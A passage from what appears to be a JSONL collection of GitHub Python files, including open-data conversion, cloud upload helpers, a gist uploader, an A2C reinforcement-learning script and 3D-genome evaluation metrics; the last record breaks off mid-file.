\"additional_contact_info\": self.additional_contact_info,\n }\n\n @staticmethod\n def create_from_dto(dto_dict: dict[str, object]) -> Client:\n obj = Client(\n name=dto_dict.get(\"name\"),\n surname=dto_dict.get(\"surname\"),\n contact_number=dto_dict.get(\"contact_number\"),\n address=dto_dict.get(\"address\"),\n email=dto_dict.get(\"email\"),\n additional_contact_info=dto_dict.get(\"additional_contact_info\")\n )\n return obj\n","repo_name":"Dubyk-Yura/Database_labs","sub_path":"my_project/auth/domain/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30022776648","text":"days = {\n 1: 'pondělí',\n 2: 'úterý',\n 3: 'středa',\n 4: 'čtvrtek',\n 5: 'pátek',\n 6: 'sobota',\n 7: 'neděle',\n}\n\nfrequency = {\n '7': 'WEEKLY',\n '14': 'BIWEEKLY',\n '30': 'MONTHLY'\n}\n\ndef map_waste_type(type, mappings):\n ret = []\n if type in mappings:\n for t in mappings[type].split(','):\n ret.append('https://data.mvcr.gov.cz/zdroj/číselníky/typy-tříděného-odpadu/položky/{}'.format(t.strip()))\n\n return ret\n\ndef get_owner(owner, owners):\n if not owner:\n return None\n\n if owner in owners:\n o = owners[owner]\n return {\n 'typ': 'Osoba',\n 'ičo': str(o['ico']),\n 'název': {\n 'cs': o['name']\n }\n }\n elif 'městská část Brno' in owner:\n return {\n 'typ': 'Osoba',\n 'ičo': str(owners['_brno']['ico']),\n 'název': {\n 'cs': owner\n }\n }\n\n return None\n\ndef get_pickup(item):\n ret = []\n\n for day in range(1,8):\n d = 'vyvoz_{}'.format(day)\n f = 'vyvoz_{}_interval'.format(day)\n\n if item[f] in frequency:\n f = frequency[str(item[f])]\n else:\n f = 'IRREG'\n\n if item[d] == 'A':\n ret.append({\n 'den_v_týdnu': [\n 'https://data.mvcr.gov.cz/zdroj/číselníky/dny-v-týdnu/položky/{}'.format(days[day])\n ],\n 'frekvence': [\n 'http://publications.europa.eu/resource/authority/frequency/{}'.format(f)\n ]\n })\n\n return ret\n\ndef build_container(src, config):\n attr = src.get('attributes')\n geo = src.get('geometry')\n iri = 'https://www.brno.cz/container/{}'.format(attr.get('tid'))\n\n ret = {\n '@context': 'https://pod-test.mvcr.gov.cz/otevřené-formální-normy/nádoby-na-tříděný-odpad/draft/kontexty/nádoby-na-tříděný-odpad.jsonld',\n 'typ': 'Nádoba na tříděný odpad',\n 'iri': iri,\n 'stanoviště_pro_nádoby': {\n 'typ': 'Stanoviště pro nádoby na tříděný odpad',\n 'iri': 'https://www.brno.cz/container-station/{}'.format(attr.get('stanoviste_ogc_fid')),\n \n },\n 'časy_vývozu': get_pickup(attr)\n }\n\n waste_type = map_waste_type(attr.get('komodita_odpad_separovany'), config['waste_mapping'])\n if waste_type:\n ret['typ_tříděného_odpadu'] = waste_type\n\n public = attr.get('verejnost')\n if public:\n ret['veřejná_přístupnost'] = public == 'A'\n\n\n volume = attr.get('objem')\n if volume:\n ret['objem'] = {\n 'typ': 'Množství',\n 'hodnota': volume,\n 'jednotka': 'LTR'\n }\n\n owner = get_owner(attr.get('majitel'), config['owners'])\n if owner:\n ret['správce'] = owner\n\n x = float(geo.get('x', 0))\n y = float(geo.get('y', 0))\n\n if x != 0 and y != 0:\n ret['stanoviště_pro_nádoby']['umístění'] = [{\n 'typ': 'Umístění',\n 'geometrie': {\n 'type': 'Point',\n 'coordinates': [x, y]\n },\n }]\n\n return ret\n\n\n","repo_name":"opendatabrno/HUBtoNKOD","sub_path":"builder/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34338537239","text":"from xml.dom.minidom import parse, parseString\n\ndom = parse(\"eat100.xml\")\n\nstimuli = dom.getElementsByTagName('stimulus')\nwords = dict()\n\nfor i in range(100):\n\tstim_word = str(stimuli[i].attributes['word'].value)\n\tresponses = stimuli[i].getElementsByTagName('response')\n\tresponse_words = []\n\tfor response in responses:\n\t\tresponse_word = str(response.attributes['word'].value)\n\t\tpercent = str(response.attributes['r'].value)\n\t\tresponse_words.append((response_word, percent))\n\twords[stim_word] = response_words\n\nfor word in words:\n\tfor response in words[word]:\n\t\tline = \"\" + \"cn:relates-to\" + \"r=\" + response[1] + '\\n'\n\t\tprint(line)","repo_name":"tetherless-world/mowgli-etl","sub_path":"mowgli_etl/pipeline/eat/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"75273480484","text":"from oslo_middleware import request_id\nimport webob\n\nfrom octavia.common import constants\n\n\n# Inspired by the OpenStack Placement service utils.py\ndef json_error_formatter(body, status, title, environ):\n \"\"\"A json_formatter for webob exceptions.\n\n Follows API-WG guidelines at\n http://specs.openstack.org/openstack/api-wg/guidelines/errors.html\n \"\"\"\n # Clear out the html that webob sneaks in.\n body = webob.exc.strip_tags(body)\n # Get status code out of status message. webob's error formatter\n # only passes entire status string.\n status_code = int(status.split(None, 1)[0])\n error_dict = {\n constants.STATUS: status_code,\n constants.TITLE: title,\n constants.DETAIL: body\n }\n\n # If the request id middleware has had a chance to add an id,\n # put it in the error response.\n if request_id.ENV_REQUEST_ID in environ:\n error_dict[constants.REQUEST_ID] = environ[request_id.ENV_REQUEST_ID]\n\n return {constants.ERRORS: [error_dict]}\n","repo_name":"openstack/octavia","sub_path":"octavia/api/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"2291063438","text":"\"\"\"Running this uploads all Python modules in this folder to an S3 bucket, to\naccess when training on Colab or another cloud service.\n\"\"\"\n\nimport os\nimport code\n\nimport boto3\nfrom google.cloud import storage\n\nfrom ccn.cfg import get_config; CFG = get_config()\n\nS3_BUCKET_NAME = CFG['s3_bucket']\nGS_BUCKET_NAME = CFG['gs_bucket']\ncode_path = os.path.dirname(os.path.abspath(__file__))\n# S3\ns3_bucket = boto3.resource('s3').Bucket(S3_BUCKET_NAME)\ns3_client = boto3.client('s3')\n# GS\nif CFG['USE_GS']:\n gs_client = storage.Client()\n gs_bucket = gs_client.bucket(GS_BUCKET_NAME)\n\n\ndef s3_upload_data(s3_path, body):\n \"\"\"Upload data to S3 bucket at a particular path\n \"\"\"\n s3_bucket.put_object(Key=s3_path, Body=body)\n\n\ndef s3_upload_file(local_path, s3_path):\n \"\"\"Upload a locally-saved file to S3\n \"\"\"\n s3_client.upload_file(local_path, S3_BUCKET_NAME, s3_path)\n\n\ndef gs_upload_blob(source_file_name, destination_blob_name):\n \"\"\"Upload a file to Google Storage bucket\n \"\"\"\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n print(\n \"File {} uploaded to {}\".format(\n source_file_name, destination_blob_name\n )\n )\n\n\ndef gs_upload_blob_from_memory(source_file, destination_blob_name):\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_file(source_file)\n print(f\"File uploaded to {destination_blob_name}\")\n\n\ndef gs_upload_blob_from_string(source_string, destination_blob_name, print_str=False):\n blob = gs_bucket.blob(destination_blob_name)\n blob.upload_from_string(source_string, content_type=\"application/json\")\n if print_str:\n print(source_string)\n print(f\"File uploaded to {destination_blob_name}\")\n\n\ndef gs_download_blob_as_string(blob_name):\n blob = gs_bucket.blob(blob_name)\n blob_str = blob.download_as_string()\n return blob_str\n\n\ndef gs_folder_exists(file_name):\n blobs = list(gs_client.list_blobs(GS_BUCKET_NAME, prefix=file_name))\n if len(blobs) > 0:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n for file in os.listdir(code_path):\n if file.endswith('.py') or file.endswith('.json'):\n with open(os.path.join(code_path, file), 'r') as f:\n py_code = f.read()\n print(f\"Uploading {file}\")\n s3_upload_data(f\"ccn/{file}\", py_code)\n # upload setup.py\n file = '../setup.py'\n with open(os.path.join(code_path, file), 'r') as f:\n py_code = f.read()\n print(\"Uploading setup.py\")\n s3_upload_data(\"setup.py\", py_code)\n","repo_name":"noahtren/Cooperative-Communication-Networks","sub_path":"ccn/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"39813712041","text":"'''\n200. Number of Islands\nLink: https://leetcode.com/problems/number-of-islands/submissions/\n\nGiven an m x n 2d grid map of '1's (land) and '0's (water), return the number of islands.\nAn island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically.\nYou may assume all four edges of the grid are all surrounded by water.\n\nInput: grid = [\n ['1', '1', '1', '1', '0'],\n ['1', '1', '0', '1', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '0', '0', '0']\n]\nOutput: 1\n\nInput: grid = [\n ['1', '1', '0', '0', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '1', '0', '0'],\n ['0', '0', '0', '1', '1']\n]\nOutput: 3\n'''\n\n\nclass Solution:\n\n\tdef num_of_lands(self, grid) -> int:\n\t\tif not grid:\n\t\t\treturn 0\n\n\t\tcount = 0\n\t\tn, m = len(grid), len(grid[0])\n\n\t\tfor row in range(n):\n\t\t\tfor col in range(m):\n\t\t\t\tif grid[row][col] == '1':\n\t\t\t\t\tself.dfs(grid, row, col)\n\t\t\t\t\tcount += 1\n\n\t\treturn count\n\n\tdef is_cell_outside(self, grid, row, col):\n\t\tn, m = len(grid), len(grid[0])\n\t\tout_bounds = row < 0 or row >= n or col < 0 or col >= m\n\t\treturn out_bounds\n\n\tdef dfs(self, grid, row, col): \n\t\t'''SINK ISLAND'''\n\t\t\n\t\tout_bounds = self.is_cell_outside(grid, row, col)\n\t\tif out_bounds or grid[row][col] == '0':\n\t\t\treturn\n\n\t\tgrid[row][col] = '0' # SINK\n\n\t\tself.dfs(grid, row, col + 1)\n\t\tself.dfs(grid, row, col - 1)\n\t\tself.dfs(grid, row + 1, col)\n\t\tself.dfs(grid, row - 1, col)\n\n\nsoln = Solution()\n\ngrid1 = [\n ['1', '1', '1', '1', '0'],\n ['1', '1', '0', '1', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '0', '0', '0']\n]\nassert soln.num_of_lands(grid1) == 1\n\ngrid2 = [\n ['1', '1', '0', '0', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '1', '0', '0'],\n ['0', '0', '0', '1', '1']\n]\nassert soln.num_of_lands(grid2) == 3\n","repo_name":"ErickMwazonga/sifu","sub_path":"backtracking/2D/no_of_islands.py","file_name":"no_of_islands.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"42383388336","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2021/8/4 11:02 下午\n# @Author : tinyzqh\n# @Email : tinyzqh@163.com\n# @File : naiveA2C.py\n\"\"\"\n\nimport gym\nimport argparse\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions import Categorical\nimport matplotlib.pyplot as plt\n\nfrom multiprocessing import Process, Pipe\n\n\ndef worker(remote, parent_remote, env_fn_wrapper):\n parent_remote.close()\n env = env_fn_wrapper.x()\n while True:\n cmd, data = remote.recv()\n if cmd == 'step':\n ob, reward, done, info = env.step(data)\n if done:\n ob = env.reset()\n remote.send((ob, reward, done, info))\n elif cmd == 'reset':\n ob = env.reset()\n remote.send(ob)\n elif cmd == 'reset_task':\n ob = env.reset_task()\n remote.send(ob)\n elif cmd == 'close':\n remote.close()\n break\n elif cmd == 'get_spaces':\n remote.send((env.observation_space, env.action_space))\n else:\n raise NotImplementedError\n\n\nclass VecEnv(object):\n \"\"\"\n An abstract asynchronous, vectorized environment.\n # This code is from openai baseline\n # https://github.com/openai/baselines/tree/master/baselines/common/vec_env\n \"\"\"\n\n def __init__(self, num_envs, observation_space, action_space):\n self.num_envs = num_envs\n self.observation_space = observation_space\n self.action_space = action_space\n\n def reset(self):\n \"\"\"\n Reset all the environments and return an array of\n observations, or a tuple of observation arrays.\n If step_async is still doing work, that work will\n be cancelled and step_wait() should not be called\n until step_async() is invoked again.\n \"\"\"\n pass\n\n def step_async(self, actions):\n \"\"\"\n Tell all the environments to start taking a step\n with the given actions.\n Call step_wait() to get the results of the step.\n You should not call this if a step_async run is\n already pending.\n \"\"\"\n pass\n\n def step_wait(self):\n \"\"\"\n Wait for the step taken with step_async().\n Returns (obs, rews, dones, infos):\n - obs: an array of observations, or a tuple of\n arrays of observations.\n - rews: an array of rewards\n - dones: an array of \"episode done\" booleans\n - infos: a sequence of info objects\n \"\"\"\n pass\n\n def close(self):\n \"\"\"\n Clean up the environments' resources.\n \"\"\"\n pass\n\n def step(self, actions):\n self.step_async(actions)\n return self.step_wait()\n\n\nclass CloudpickleWrapper(object):\n \"\"\"\n Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)\n \"\"\"\n\n def __init__(self, x):\n self.x = x\n\n def __getstate__(self):\n import cloudpickle\n return cloudpickle.dumps(self.x)\n\n def __setstate__(self, ob):\n import pickle\n self.x = pickle.loads(ob)\n\n\nclass SubprocVecEnv(VecEnv):\n def __init__(self, env_fns, spaces=None):\n \"\"\"\n envs: list of gym environments to run in subprocesses\n \"\"\"\n self.waiting = False\n self.closed = False\n nenvs = len(env_fns)\n self.nenvs = nenvs\n self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])\n self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))\n for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]\n for p in self.ps:\n p.daemon = True # if the main process crashes, we should not cause things to hang\n p.start()\n for remote in self.work_remotes:\n remote.close()\n\n self.remotes[0].send(('get_spaces', None))\n observation_space, action_space = self.remotes[0].recv()\n VecEnv.__init__(self, len(env_fns), observation_space, action_space)\n\n def step_async(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n self.waiting = True\n\n def step_wait(self):\n results = [remote.recv() for remote in self.remotes]\n self.waiting = False\n obs, rews, dones, infos = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones), infos\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def reset_task(self):\n for remote in self.remotes:\n remote.send(('reset_task', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def close(self):\n if self.closed:\n return\n if self.waiting:\n for remote in self.remotes:\n remote.recv()\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n self.closed = True\n\n def __len__(self):\n return self.nenvs\n\n\ndef make_env(args):\n def _thunk():\n env = gym.make(args.env_name)\n return env\n\n return _thunk\n\n\nclass ActorCritic(nn.Module):\n def __init__(self, num_inputs, num_outputs, hidden_size, std=0.0):\n super(ActorCritic, self).__init__()\n\n self.critic = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1)\n )\n\n self.actor = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, num_outputs),\n nn.Softmax(dim=1),\n )\n\n def forward(self, x):\n value = self.critic(x)\n probs = self.actor(x)\n dist = Categorical(probs)\n return dist, value\n\n\ndef test_env(args, vis=False):\n env = gym.make(args.env_name) # a single env\n state = env.reset()\n if vis: env.render()\n done = False\n total_reward = 0\n while not done:\n state = torch.FloatTensor(state).unsqueeze(0).to(device)\n dist, _ = model(state)\n next_state, reward, done, _ = env.step(dist.sample().cpu().numpy()[0])\n state = next_state\n if vis: env.render()\n total_reward += reward\n return total_reward\n\n\ndef compute_returns(next_value, rewards, masks, gamma=0.99):\n R = next_value\n returns = []\n for step in reversed(range(len(rewards))):\n R = rewards[step] + gamma * R * masks[step]\n returns.insert(0, R)\n return returns\n\n\ndef plot(epoch, rewards):\n plt.plot(rewards, 'b-')\n plt.title('frame %s. reward: %s' % (epoch, rewards[-1]))\n plt.pause(0.0001)\n\n\nclass Agent(object):\n def __init__(self, env, exp_buffer, args):\n super(Agent, self).__init__()\n\n def build_model(self):\n pass\n\n def learn(self):\n pass\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"the parameter of a2c\")\n parser.add_argument('--hidden_size', type=int, help=\"maximum capacity of the buffer\", default=256)\n parser.add_argument('--lr', type=float, help='learning rate used in the Adam optimizer', default=1e-3)\n parser.add_argument('--num_steps', type=int, help=\"the num of rollout\", default=5)\n parser.add_argument(\"--env_name\", default=\"CartPole-v0\") # OpenAI gym environment name\n parser.add_argument(\"--num_envs\", type=int, default=8) # OpenAI gym environment name\n arg = parser.parse_args()\n\n plt.ion()\n envs = [make_env(arg) for i in range(arg.num_envs)]\n envs = SubprocVecEnv(envs) # 8 env\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = ActorCritic(envs.observation_space.shape[0], envs.action_space.n, arg.hidden_size).to(device)\n optimizer = optim.Adam(model.parameters())\n\n test_rewards = []\n\n state = envs.reset()\n for epoch in range(20000):\n log_probs = []\n values = []\n rewards = []\n masks = []\n entropy = 0\n\n for _ in range(arg.num_steps): # rollout trajectory\n state = torch.FloatTensor(state).to(device)\n dist, value = model(state)\n\n action = dist.sample()\n next_state, reward, done, _ = envs.step(action.cpu().numpy())\n\n log_prob = dist.log_prob(action)\n entropy += dist.entropy().mean()\n\n log_probs.append(log_prob)\n values.append(value)\n rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))\n masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))\n\n state = next_state\n\n if epoch % 100 == 0:\n test_rewards.append(np.mean([test_env(args=arg) for _ in range(10)]))\n plot(epoch, test_rewards)\n\n next_state = torch.FloatTensor(next_state).to(device)\n _, next_value = model(next_state)\n returns = compute_returns(next_value, rewards, masks)\n\n log_probs = torch.cat(log_probs)\n returns = torch.cat(returns).detach()\n values = torch.cat(values)\n\n advantage = returns - values\n\n actor_loss = -(log_probs * advantage.detach()).mean()\n critic_loss = advantage.pow(2).mean()\n\n loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # test_env(True)\n","repo_name":"tinyzqh/awesome-reinforcement-learning","sub_path":"chap10 A2C/naiveA2C.py","file_name":"naiveA2C.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"52"} +{"seq_id":"23301001783","text":"import httplib\nimport urllib\nimport re\nimport os.path\nfrom optparse import OptionParser\nimport platform\nimport sys\nimport json\nimport logging\nfrom copy import deepcopy\n\nFORMAT = \"[%(levelname)s %(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s\"\nlogging.basicConfig(level=logging.ERROR, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\ntry:\n from ssl import _create_unverified_context\n have_ssl = True\nexcept ImportError:\n logger.error(\"ERROR - could not import ssl._create_unverified_context; unable to disable SSL cert verification\")\n have_ssl = False\n\ndef debug_response(response):\n logger.debug(\"Response status {s}\".format(s=response.status))\n logger.debug(\"Response: {d}\".format(d=response.read()))\n logger.debug(\"Headers: \\n{h}\".format(\n h='\\n'.join(['{k}: {v}\\n'.format(k=i[0], v=i[1]) for i in response.getheaders()])\n ))\n\ndef gist_write(name, content, token=None, prefix=False, no_verify=False):\n if prefix:\n name = '{n}_{name}'.format(n=platform.node(), name=name)\n logger.debug(\"Setting name to: {n}\".format(n=name))\n\n data = {\n 'public': False,\n 'files': {\n name: {\n 'content': content\n }\n }\n }\n\n # data debug\n d = deepcopy(data)\n if len(d['files'][name]['content']) > 800:\n tmp = d['files'][name]['content']\n d['files'][name]['content'] = tmp[:200] + \"\\n...\\n\" + tmp[-200:]\n logger.debug(\"POST data: {d}\".format(d=d))\n headers = {'User-Agent': 'https://github.com/jantman/misc-scripts/blob/master/gist.py'}\n if token is not None:\n headers['Authorization'] = 'token {t}'.format(t=token)\n logger.debug(\"Setting Authorization header to: {h}\".format(h=headers['Authorization']))\n\n if no_verify:\n conn = httplib.HTTPSConnection(\"api.github.com\", context=_create_unverified_context())\n else:\n conn = httplib.HTTPSConnection(\"api.github.com\")\n logger.debug(\"Opened connection to https://api.github.com\")\n logger.debug(\"POSTing to /gists\")\n conn.request(\"POST\", \"/gists\", json.dumps(data), headers)\n response = conn.getresponse()\n debug_response(response)\n if response.status == 201:\n data = response.read()\n conn.close()\n try:\n d = json.loads(data)\n return(d['html_url'])\n except:\n pass\n logger.error(\"Got 201 status but no JSON response\")\n logger.debug(\"Response: \\n{d}\".format(d=data))\n h = response.getheaders()\n for header in h:\n if header[0] == 'location':\n url = header[1].replace('api.github.com/gists/', 'gist.github.com/')\n return url\n return ''\n logger.error(\"ERROR - got response code {s}\".format(s=response.status))\n conn.close()\n raise SystemExit(1)\n\nusage = 'USAGE: gist.py [options] filename'\nparser = OptionParser(usage=usage)\nparser.add_option('-d', '--description', dest='description', action='store',\n type=str, help='Gist description')\nparser.add_option('-p', '--prefix', dest='prefix', action='store_false',\n default=True,\n help='prefix gist filename with hostname')\nparser.add_option('-v', '--verbose', dest='verbose', action='store_true',\n help='verbose output')\nparser.add_option('-V', '--no-verify', dest='no_verify', action='store_true',\n default=False, help='do not verify SSL')\n(options, args) = parser.parse_args()\n\nif options.verbose:\n logger.setLevel(logging.DEBUG)\n\nif options.no_verify and not have_ssl:\n logger.error(\"ERROR: could not import ssl._create_unverified_context; therefore unable to disable SSL cert verification\")\n raise SystemExit(1)\n\nif len(args) < 1:\n sys.stderr.write(usage + \"\\n\")\n raise SystemExit(1)\n\nif not os.path.exists(args[0]):\n logger.error(\"ERROR: {f} does not exist\".format(f=args[0]))\n raise SystemExit(1)\n\ntoken = raw_input(\"GitHub API Token: \").strip()\nif token == '':\n logger.error(\"ERROR: empty token\")\n raise SystemExit(1)\n\nwith open(args[0], 'r') as fh:\n content = fh.read()\n\nname = args[0]\nurl = gist_write(name, content, token=token, prefix=options.prefix, no_verify=options.no_verify)\nlogger.info(\"Created: {u}\".format(u=url))\n","repo_name":"jantman/misc-scripts","sub_path":"gist.py","file_name":"gist.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"35629844752","text":"# 文件 rectangle.py\nimport ctypes\n\nlib = ctypes.cdll.LoadLibrary('./librectangle.so')\n\nclass Rectangle:\n def __init__(self, width, height):\n self._methods = dict()\n self._methods['area'] = lib.area\n self._methods['perimeter'] = lib.perimeter\n lib.create.argtypes = (ctypes.c_double, ctypes.c_double)\n lib.create.restype = ctypes.c_void_p\n lib.area.argtypes = (ctypes.c_void_p,)\n lib.area.restype = ctypes.c_double\n lib.perimeter.argtypes = (ctypes.c_void_p,)\n lib.perimeter.restype = ctypes.c_double\n self.obj = lib.create(width, height)\n self._m_name = None\n\n def __getattr__(self, attr):\n self._m_name = attr\n return self.__call_method\n\n def __call_method(self, *args):\n return self._methods[self._m_name](self.obj, *args)","repo_name":"hitlic/python_book","sub_path":"codes/chapter-09/eg_9-11/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"19012299990","text":"#calculate the metrics of dRMSE, dPCC and dSCC\nimport math\nimport numpy as np\nimport pandas as pd\n\ndef calxyzDist(xyzDir):\n xyz = np.loadtxt(xyzDir)\n d = np.zeros((len(xyz), len(xyz)))\n for i in range(len(xyz)):\n for j in range(len(xyz)):\n if not np.isnan(xyz[i]).any() and not np.isnan(xyz[j]).any():\n d[i,j]=np.sqrt(np.sum((xyz[i] - xyz[j])**2))\n return d\n\ndef calcDistance(coord1, coord2):\n \"\"\"Euclidean distance between coordinates\"\"\"\n return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2 + (coord1[2] - coord2[2])**2)**(1./2)\n\ndef radius_of_gyration(coords):\n centroid = np.mean(coords, axis=0)\n dist_sum = sum([calcDistance(coord, centroid) for coord in coords])\n return dist_sum/len(coords)\n\n#evaluate the metrics with calculated distance from Hi-C contact matrix\ndef evalMetrics(distDir,xyzDir,evalfileDir,hicfilename,alpha):\n d=calxyzDist(xyzDir)\n D = np.loadtxt(distDir)\n print(len(D),len(d))\n #dRMSE\n scaling_factor = radius_of_gyration(D)/radius_of_gyration(d)\n drms = 0\n for i in range(len(D)):\n for j in range(len(d)):\n drms = drms + (d[i,j] * scaling_factor-D[i,j])**2\n drms = drms / (len(D)**2)\n drms = math.sqrt(drms)\n drms=np.around(drms,2)\n print(\"dRMSE:\",drms)\n\n # dPCC\n df = pd.DataFrame({'D':D.reshape(-1),'d':d.reshape(-1)})\n pcc=df.corr()\n pcc=np.array(pcc.iloc[[1],[0]])[0][0]\n pcc=np.around(pcc,3)\n print(\"dPCC:\",pcc)\n \n #dSCC\n scc=df.corr('spearman')\n scc=np.array(scc.iloc[[1],[0]])[0][0]\n scc=np.around(scc,3)\n print(\"dSCC:\",scc)\n with open(evalfileDir,'a+') as f:\n f.write(\"\\t\".join((str(hicfilename),str(alpha),str(drms),str(pcc),str(scc)))+'\\n')\n f.close()\n return drms,pcc,scc\n\n#evaluate the metrics with true xyz of simulated Hi-C\ndef evalTrue(truexyzDir,xyzDir,trueevalfileDir,hicfilename,alpha):\n d=calxyzDist(xyzDir)\n D = calxyzDist(truexyzDir)\n print(len(D),len(d))\n #dRMSE\n scaling_factor = radius_of_gyration(D)/radius_of_gyration(d)\n drms = 0\n for i in range(len(D)):\n for j in range(len(d)):\n drms = drms + (d[i,j] * scaling_factor-D[i,j])**2\n drms = drms / (len(D)**2)\n drms = math.sqrt(drms)\n print(\"dRMSE:\",drms)\n\n # dPCC\n df = pd.DataFrame({'D':D.reshape(-1),'d':d.reshape(-1)})\n pcc=df.corr()\n pcc=np.array(pcc.iloc[[1],[0]])[0][0]\n pcc=np.around(pcc,3)\n print(\"dPCC:\",pcc)\n \n #dSCC\n scc=df.corr('spearman')\n scc=np.array(scc.iloc[[1],[0]])[0][0]\n scc=np.around(scc,3)\n print(\"dSCC:\",scc)\n\n with open(trueevalfileDir,'a+') as f:\n f.write(\"\\t\".join((str(hicfilename),str(alpha),str(drms),str(pcc),str(scc)))+'\\n')\n f.close()\n return drms,pcc,scc\n\"\"\"\ntrue Hi-C data\n#'_NeRV_chr19_50000_0.4','NeRV','LargeVis','3DMax','ShNeigh1','GEM','EVR'\n#ShNeigh1 and LorDG:维数有问题,1121\n\n\nfor xyzname in ['miniMDS']:\n distDir1=\"/data1/ghy_data/GM12878/3DResults/NeRV_3D/chr19_50000_0.3.dist\"\n distDir2=\"/data1/ghy_data/GM12878/3DResults/NeRV_3D/chr19_50000_0.4.dist\"\n xyzDir=\"/home/ghaiyan/project/NeRV-3D/GM12878/chr19_50kb/\"+xyzname+\".xyz\"\n evalfileDir=\"/home/ghaiyan/project/NeRV-3D/GM12878/chr19_50kb/evalueCompare_test.txt\"\n hicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\n trueevalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueComparetrue_test.txt\"\n truexyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/test2000.xyz\"\n alpha1=0.3\n alpha2=0.4\n evalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n evalMetrics(distDir2,xyzDir,evalfileDir,hicfilename,alpha2)\n\"\"\"\n\n\"\"\"\nsimulate Hi-C data evaluate\n'_NeRV_test2000_0.9','NeRV','LargeVis','3DMax','ShNeigh1','miniMDS','ShRec3D','EVR','LorDG','GEM'\n\nfor xyzname in ['GEM']:\n distDir1=\"/home/ghaiyan/project/NeRV-3D/chrtest/NeRV_3d_test/test2000_0.3.dist\"\n distDir2=\"/home/ghaiyan/project/NeRV-3D/chrtest/NeRV_3d_test/test2000_0.9.dist\"\n xyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/\"+xyzname+\".xyz\"\n evalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueCompare_test.txt\"\n hicfilename=\"/home/ghaiyan/project/NeRV-3D/chrtest/test.hic\"\n trueevalfileDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/evalueComparetrue_test.txt\"\n truexyzDir=\"/home/ghaiyan/project/NeRV-3D/chrtest/test2000.xyz\"\n alpha1=0.3\n alpha2=0.9\n evalMetrics(distDir1,xyzDir,evalfileDir,hicfilename,alpha1)\n evalMetrics(distDir2,xyzDir,evalfileDir,hicfilename,alpha2)\n evalTrue(truexyzDir,xyzDir,trueevalfileDir,hicfilename,alpha1)\n\"\"\"\n\n\"\"\"\ntrue Hi-C data in a high resolution 